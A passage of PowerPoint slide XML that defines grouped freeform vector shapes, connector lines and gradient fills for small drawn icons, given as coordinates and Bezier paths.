                        <a:pt x="15" y="201"/>
                        <a:pt x="15" y="201"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="129" y="150"/>
                        <a:pt x="129" y="150"/>
                        <a:pt x="129" y="150"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="149" y="112"/>
                        <a:pt x="149" y="112"/>
                        <a:pt x="149" y="112"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="149" y="60"/>
                        <a:pt x="149" y="60"/>
                        <a:pt x="149" y="6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3" y="35"/>
                        <a:pt x="20" y="189"/>
                        <a:pt x="0" y="20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86" name="Freeform 1731"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="-1948" y="-1964"/>
                  <a:ext cx="661" cy="175"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 661"/>
                    <a:gd name="T1" fmla="*/ 52 h 175"/>
                    <a:gd name="T2" fmla="*/ 208 w 661"/>
                    <a:gd name="T3" fmla="*/ 0 h 175"/>
                    <a:gd name="T4" fmla="*/ 661 w 661"/>
                    <a:gd name="T5" fmla="*/ 121 h 175"/>
                    <a:gd name="T6" fmla="*/ 453 w 661"/>
                    <a:gd name="T7" fmla="*/ 175 h 175"/>
                    <a:gd name="T8" fmla="*/ 0 w 661"/>
                    <a:gd name="T9" fmla="*/ 52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1" h="175">
                      <a:moveTo>
                        <a:pt x="0" y="52"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="208" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="661" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="453" y="175"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="5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87" name="Freeform 1732"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="-1495" y="-1843"/>
                  <a:ext cx="199" cy="87"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 199"/>
                    <a:gd name="T1" fmla="*/ 54 h 87"/>
                    <a:gd name="T2" fmla="*/ 0 w 199"/>
                    <a:gd name="T3" fmla="*/ 87 h 87"/>
                    <a:gd name="T4" fmla="*/ 199 w 199"/>
                    <a:gd name="T5" fmla="*/ 35 h 87"/>
                    <a:gd name="T6" fmla="*/ 199 w 199"/>
                    <a:gd name="T7" fmla="*/ 0 h 87"/>
                    <a:gd name="T8" fmla="*/ 0 w 199"/>
                    <a:gd name="T9" fmla="*/ 54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9" h="87">
                      <a:moveTo>
                        <a:pt x="0" y="54"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="87"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="199" y="35"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="199" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="5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88" name="Freeform 1733"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="-1948" y="-1912"/>
                  <a:ext cx="453" cy="156"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 453 w 453"/>
                    <a:gd name="T1" fmla="*/ 156 h 156"/>
                    <a:gd name="T2" fmla="*/ 0 w 453"/>
                    <a:gd name="T3" fmla="*/ 36 h 156"/>
                    <a:gd name="T4" fmla="*/ 0 w 453"/>
                    <a:gd name="T5" fmla="*/ 0 h 156"/>
                    <a:gd name="T6" fmla="*/ 453 w 453"/>
                    <a:gd name="T7" fmla="*/ 123 h 156"/>
                    <a:gd name="T8" fmla="*/ 453 w 453"/>
                    <a:gd name="T9" fmla="*/ 156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3" h="156">
                      <a:moveTo>
                        <a:pt x="453" y="156"/>
                      </a:move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453" y="123"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="453" y="15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89" name="Freeform 1734"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="-1884" y="-1949"/>
                  <a:ext cx="517" cy="139"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 517"/>
                    <a:gd name="T1" fmla="*/ 37 h 139"/>
                    <a:gd name="T2" fmla="*/ 382 w 517"/>
                    <a:gd name="T3" fmla="*/ 139 h 139"/>
                    <a:gd name="T4" fmla="*/ 517 w 517"/>
                    <a:gd name="T5" fmla="*/ 101 h 139"/>
                    <a:gd name="T6" fmla="*/ 134 w 517"/>
                    <a:gd name="T7" fmla="*/ 0 h 139"/>
                    <a:gd name="T8" fmla="*/ 0 w 517"/>
                    <a:gd name="T9" fmla="*/ 37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7" h="139">
                      <a:moveTo>
                        <a:pt x="0" y="37"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="382" y="139"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="517" y="101"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="134" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="3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90" name="Freeform 1735"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="-1034" y="-2247"/>
                  <a:ext cx="454" cy="588"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 454"/>
                    <a:gd name="T1" fmla="*/ 120 h 588"/>
                    <a:gd name="T2" fmla="*/ 0 w 454"/>
                    <a:gd name="T3" fmla="*/ 588 h 588"/>
                    <a:gd name="T4" fmla="*/ 454 w 454"/>
                    <a:gd name="T5" fmla="*/ 468 h 588"/>
                    <a:gd name="T6" fmla="*/ 454 w 454"/>
                    <a:gd name="T7" fmla="*/ 0 h 588"/>
                    <a:gd name="T8" fmla="*/ 0 w 454"/>
                    <a:gd name="T9" fmla="*/ 120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588">
                      <a:moveTo>
                        <a:pt x="0" y="120"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="588"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="454" y="468"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="454" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="12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91" name="Freeform 1736"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="-1258" y="-2188"/>
                  <a:ext cx="224" cy="529"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 224"/>
                    <a:gd name="T1" fmla="*/ 0 h 529"/>
                    <a:gd name="T2" fmla="*/ 0 w 224"/>
                    <a:gd name="T3" fmla="*/ 470 h 529"/>
                    <a:gd name="T4" fmla="*/ 224 w 224"/>
                    <a:gd name="T5" fmla="*/ 529 h 529"/>
                    <a:gd name="T6" fmla="*/ 224 w 224"/>
                    <a:gd name="T7" fmla="*/ 61 h 529"/>
                    <a:gd name="T8" fmla="*/ 0 w 224"/>
                    <a:gd name="T9" fmla="*/ 0 h 5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4" h="529">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="470"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="224" y="529"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="224" y="6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92" name="Freeform 1737"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="-1258" y="-2309"/>
                  <a:ext cx="678" cy="182"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 678"/>
                    <a:gd name="T1" fmla="*/ 121 h 182"/>
                    <a:gd name="T2" fmla="*/ 451 w 678"/>
                    <a:gd name="T3" fmla="*/ 0 h 182"/>
                    <a:gd name="T4" fmla="*/ 678 w 678"/>
                    <a:gd name="T5" fmla="*/ 62 h 182"/>
                    <a:gd name="T6" fmla="*/ 224 w 678"/>
                    <a:gd name="T7" fmla="*/ 182 h 182"/>
                    <a:gd name="T8" fmla="*/ 0 w 678"/>
                    <a:gd name="T9" fmla="*/ 121 h 1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8" h="182">
                      <a:moveTo>
                        <a:pt x="0" y="121"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="451" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="678" y="62"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="224" y="182"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="12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93" name="Freeform 1738"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="-1228" y="-2134"/>
                  <a:ext cx="156" cy="88"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 156"/>
                    <a:gd name="T1" fmla="*/ 0 h 88"/>
                    <a:gd name="T2" fmla="*/ 0 w 156"/>
                    <a:gd name="T3" fmla="*/ 48 h 88"/>
                    <a:gd name="T4" fmla="*/ 156 w 156"/>
                    <a:gd name="T5" fmla="*/ 88 h 88"/>
                    <a:gd name="T6" fmla="*/ 156 w 156"/>
                    <a:gd name="T7" fmla="*/ 43 h 88"/>
                    <a:gd name="T8" fmla="*/ 0 w 156"/>
                    <a:gd name="T9" fmla="*/ 0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6" h="88">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="48"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="156" y="88"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="156" y="4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</p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="139" name="Line 1768"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6480175" y="2600326"/>
                <a:ext cx="0" cy="142875"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050">
                <a:solidFill>
                  <a:srgbClr val="FF66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grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="140" name="Group 1740"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="6264275" y="2459038"/>
                <a:ext cx="341313" cy="220663"/>
                <a:chOff x="126" y="1682"/>
                <a:chExt cx="646" cy="417"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="174" name="Freeform 1741"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="295" y="1682"/>
                  <a:ext cx="295" cy="368"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 14 w 211"/>
                    <a:gd name="T1" fmla="*/ 8 h 263"/>
                    <a:gd name="T2" fmla="*/ 14 w 211"/>
                    <a:gd name="T3" fmla="*/ 207 h 263"/>
                    <a:gd name="T4" fmla="*/ 192 w 211"/>
                    <a:gd name="T5" fmla="*/ 254 h 263"/>
                    <a:gd name="T6" fmla="*/ 192 w 211"/>
                    <a:gd name="T7" fmla="*/ 56 h 263"/>
                    <a:gd name="T8" fmla="*/ 14 w 211"/>
                    <a:gd name="T9" fmla="*/ 8 h 2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1" h="263">
                      <a:moveTo>
                        <a:pt x="14" y="8"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="16"/>
                        <a:pt x="1" y="187"/>
                        <a:pt x="14" y="207"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="226"/>
                        <a:pt x="179" y="263"/>
                        <a:pt x="192" y="254"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="204" y="246"/>
                        <a:pt x="211" y="94"/>
                        <a:pt x="192" y="56"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="185" y="42"/>
                        <a:pt x="28" y="0"/>
                        <a:pt x="14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75" name="Freeform 1742"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="333" y="1719"/>
                  <a:ext cx="212" cy="291"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 359"/>
                    <a:gd name="T1" fmla="*/ 0 h 493"/>
                    <a:gd name="T2" fmla="*/ 0 w 359"/>
                    <a:gd name="T3" fmla="*/ 397 h 493"/>
                    <a:gd name="T4" fmla="*/ 359 w 359"/>
                    <a:gd name="T5" fmla="*/ 493 h 493"/>
                    <a:gd name="T6" fmla="*/ 359 w 359"/>
                    <a:gd name="T7" fmla="*/ 97 h 493"/>
                    <a:gd name="T8" fmla="*/ 0 w 359"/>
                    <a:gd name="T9" fmla="*/ 0 h 4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9" h="493">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="397"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="359" y="493"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="359" y="9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chemeClr val="hlink"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="hlink">
                        <a:gamma/>
                        <a:tint val="60784"/>
                        <a:invGamma/>
                      </a:schemeClr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76" name="Freeform 1743"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="315" y="1684"/>
                  <a:ext cx="284" cy="90"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 99 w 203"/>
                    <a:gd name="T1" fmla="*/ 15 h 65"/>
                    <a:gd name="T2" fmla="*/ 27 w 203"/>
                    <a:gd name="T3" fmla="*/ 0 h 65"/>
                    <a:gd name="T4" fmla="*/ 0 w 203"/>
                    <a:gd name="T5" fmla="*/ 7 h 65"/>
                    <a:gd name="T6" fmla="*/ 0 w 203"/>
                    <a:gd name="T7" fmla="*/ 7 h 65"/>
                    <a:gd name="T8" fmla="*/ 0 w 203"/>
                    <a:gd name="T9" fmla="*/ 7 h 65"/>
                    <a:gd name="T10" fmla="*/ 178 w 203"/>
                    <a:gd name="T11" fmla="*/ 55 h 65"/>
                    <a:gd name="T12" fmla="*/ 203 w 203"/>
                    <a:gd name="T13" fmla="*/ 48 h 65"/>
                    <a:gd name="T14" fmla="*/ 99 w 203"/>
                    <a:gd name="T15" fmla="*/ 15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03" h="65">
                      <a:moveTo>
                        <a:pt x="99" y="15"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="2"/>
                        <a:pt x="27" y="0"/>
                        <a:pt x="27" y="0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2" y="0"/>
                        <a:pt x="168" y="44"/>
                        <a:pt x="178" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="188" y="65"/>
                        <a:pt x="203" y="48"/>
                        <a:pt x="203" y="48"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="203" y="48"/>
                        <a:pt x="163" y="29"/>
                        <a:pt x="99" y="1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77" name="Freeform 1744"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="564" y="1751"/>
                  <a:ext cx="208" cy="286"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 149"/>
                    <a:gd name="T1" fmla="*/ 205 h 205"/>
                    <a:gd name="T2" fmla="*/ 15 w 149"/>
                    <a:gd name="T3" fmla="*/ 201 h 205"/>
                    <a:gd name="T4" fmla="*/ 129 w 149"/>
                    <a:gd name="T5" fmla="*/ 150 h 205"/>
                    <a:gd name="T6" fmla="*/ 149 w 149"/>
                    <a:gd name="T7" fmla="*/ 112 h 205"/>
                    <a:gd name="T8" fmla="*/ 149 w 149"/>
                    <a:gd name="T9" fmla="*/ 60 h 205"/>
                    <a:gd name="T10" fmla="*/ 25 w 149"/>
                    <a:gd name="T11" fmla="*/ 0 h 205"/>
                    <a:gd name="T12" fmla="*/ 0 w 149"/>
                    <a:gd name="T13" fmla="*/ 7 h 205"/>
                    <a:gd name="T14" fmla="*/ 0 w 149"/>
                    <a:gd name="T15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49" h="205">
                      <a:moveTo>
                        <a:pt x="0" y="205"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="201"/>
                        <a:pt x="15" y="201"/>
                        <a:pt x="15" y="201"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="129" y="150"/>
                        <a:pt x="129" y="150"/>
                        <a:pt x="129" y="150"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="149" y="112"/>
                        <a:pt x="149" y="112"/>
                        <a:pt x="149" y="112"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="149" y="60"/>
                        <a:pt x="149" y="60"/>
                        <a:pt x="149" y="6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3" y="35"/>
                        <a:pt x="20" y="189"/>
                        <a:pt x="0" y="20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78" name="Freeform 1745"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="126" y="1976"/>
                  <a:ext cx="391" cy="103"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 661"/>
                    <a:gd name="T1" fmla="*/ 52 h 175"/>
                    <a:gd name="T2" fmla="*/ 208 w 661"/>
                    <a:gd name="T3" fmla="*/ 0 h 175"/>
                    <a:gd name="T4" fmla="*/ 661 w 661"/>
                    <a:gd name="T5" fmla="*/ 121 h 175"/>
                    <a:gd name="T6" fmla="*/ 453 w 661"/>
                    <a:gd name="T7" fmla="*/ 175 h 175"/>
                    <a:gd name="T8" fmla="*/ 0 w 661"/>
                    <a:gd name="T9" fmla="*/ 52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1" h="175">
                      <a:moveTo>
                        <a:pt x="0" y="52"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="208" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="661" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="453" y="175"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="5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79" name="Freeform 1746"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="394" y="2047"/>
                  <a:ext cx="118" cy="52"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 199"/>
                    <a:gd name="T1" fmla="*/ 54 h 87"/>
                    <a:gd name="T2" fmla="*/ 0 w 199"/>
                    <a:gd name="T3" fmla="*/ 87 h 87"/>
                    <a:gd name="T4" fmla="*/ 199 w 199"/>
                    <a:gd name="T5" fmla="*/ 35 h 87"/>
                    <a:gd name="T6" fmla="*/ 199 w 199"/>
                    <a:gd name="T7" fmla="*/ 0 h 87"/>
                    <a:gd name="T8" fmla="*/ 0 w 199"/>
                    <a:gd name="T9" fmla="*/ 54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9" h="87">
                      <a:moveTo>
                        <a:pt x="0" y="54"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="87"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="199" y="35"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="199" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="5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80" name="Freeform 1747"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="126" y="2006"/>
                  <a:ext cx="268" cy="93"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 453 w 453"/>
                    <a:gd name="T1" fmla="*/ 156 h 156"/>
                    <a:gd name="T2" fmla="*/ 0 w 453"/>
                    <a:gd name="T3" fmla="*/ 36 h 156"/>
                    <a:gd name="T4" fmla="*/ 0 w 453"/>
                    <a:gd name="T5" fmla="*/ 0 h 156"/>
                    <a:gd name="T6" fmla="*/ 453 w 453"/>
                    <a:gd name="T7" fmla="*/ 123 h 156"/>
                    <a:gd name="T8" fmla="*/ 453 w 453"/>
                    <a:gd name="T9" fmla="*/ 156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3" h="156">
                      <a:moveTo>
                        <a:pt x="453" y="156"/>
                      </a:move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453" y="123"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="453" y="15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81" name="Freeform 1748"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="164" y="1984"/>
                  <a:ext cx="306" cy="83"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 517"/>
                    <a:gd name="T1" fmla="*/ 37 h 139"/>
                    <a:gd name="T2" fmla="*/ 382 w 517"/>
                    <a:gd name="T3" fmla="*/ 139 h 139"/>
                    <a:gd name="T4" fmla="*/ 517 w 517"/>
                    <a:gd name="T5" fmla="*/ 101 h 139"/>
                    <a:gd name="T6" fmla="*/ 134 w 517"/>
                    <a:gd name="T7" fmla="*/ 0 h 139"/>
                    <a:gd name="T8" fmla="*/ 0 w 517"/>
                    <a:gd name="T9" fmla="*/ 37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7" h="139">
                      <a:moveTo>
                        <a:pt x="0" y="37"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="382" y="139"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="517" y="101"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="134" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="3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</p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="141" name="Line 1769"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5832475" y="2600326"/>
                <a:ext cx="0" cy="142875"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050">
                <a:solidFill>
                  <a:srgbClr val="FF66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sp>
            <p:nvSpPr>
              <p:cNvPr id="142" name="Line 1770"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5472113" y="2708276"/>
                <a:ext cx="0" cy="142875"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050">
                <a:solidFill>
                  <a:srgbClr val="FF66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grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="143" name="Group 1767"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="5327650" y="2457451"/>
                <a:ext cx="701675" cy="323850"/>
                <a:chOff x="3356" y="1525"/>
                <a:chExt cx="442" cy="204"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="156" name="Group 1749"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="3583" y="1525"/>
                  <a:ext cx="215" cy="139"/>
                  <a:chOff x="126" y="1682"/>
                  <a:chExt cx="646" cy="417"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="166" name="Freeform 1750"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="295" y="1682"/>
                    <a:ext cx="295" cy="368"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 14 w 211"/>
                      <a:gd name="T1" fmla="*/ 8 h 263"/>
                      <a:gd name="T2" fmla="*/ 14 w 211"/>
                      <a:gd name="T3" fmla="*/ 207 h 263"/>
                      <a:gd name="T4" fmla="*/ 192 w 211"/>
                      <a:gd name="T5" fmla="*/ 254 h 263"/>
                      <a:gd name="T6" fmla="*/ 192 w 211"/>
                      <a:gd name="T7" fmla="*/ 56 h 263"/>
                      <a:gd name="T8" fmla="*/ 14 w 211"/>
                      <a:gd name="T9" fmla="*/ 8 h 2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1" h="263">
                        <a:moveTo>
                          <a:pt x="14" y="8"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="16"/>
                          <a:pt x="1" y="187"/>
                          <a:pt x="14" y="207"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="27" y="226"/>
                          <a:pt x="179" y="263"/>
                          <a:pt x="192" y="254"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="204" y="246"/>
                          <a:pt x="211" y="94"/>
                          <a:pt x="192" y="56"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="185" y="42"/>
                          <a:pt x="28" y="0"/>
                          <a:pt x="14" y="8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Arial" charset="0"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="167" name="Freeform 1751"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="333" y="1719"/>
                    <a:ext cx="212" cy="291"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 359"/>
                      <a:gd name="T1" fmla="*/ 0 h 493"/>
                      <a:gd name="T2" fmla="*/ 0 w 359"/>
                      <a:gd name="T3" fmla="*/ 397 h 493"/>
                      <a:gd name="T4" fmla="*/ 359 w 359"/>
                      <a:gd name="T5" fmla="*/ 493 h 493"/>
                      <a:gd name="T6" fmla="*/ 359 w 359"/>
                      <a:gd name="T7" fmla="*/ 97 h 493"/>
                      <a:gd name="T8" fmla="*/ 0 w 359"/>
                      <a:gd name="T9" fmla="*/ 0 h 4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59" h="493">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="397"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="359" y="493"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="359" y="9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hlink"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:schemeClr val="hlink">
                          <a:gamma/>
                          <a:tint val="68627"/>
                          <a:invGamma/>
                        </a:schemeClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="27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Arial" charset="0"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="168" name="Freeform 1752"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
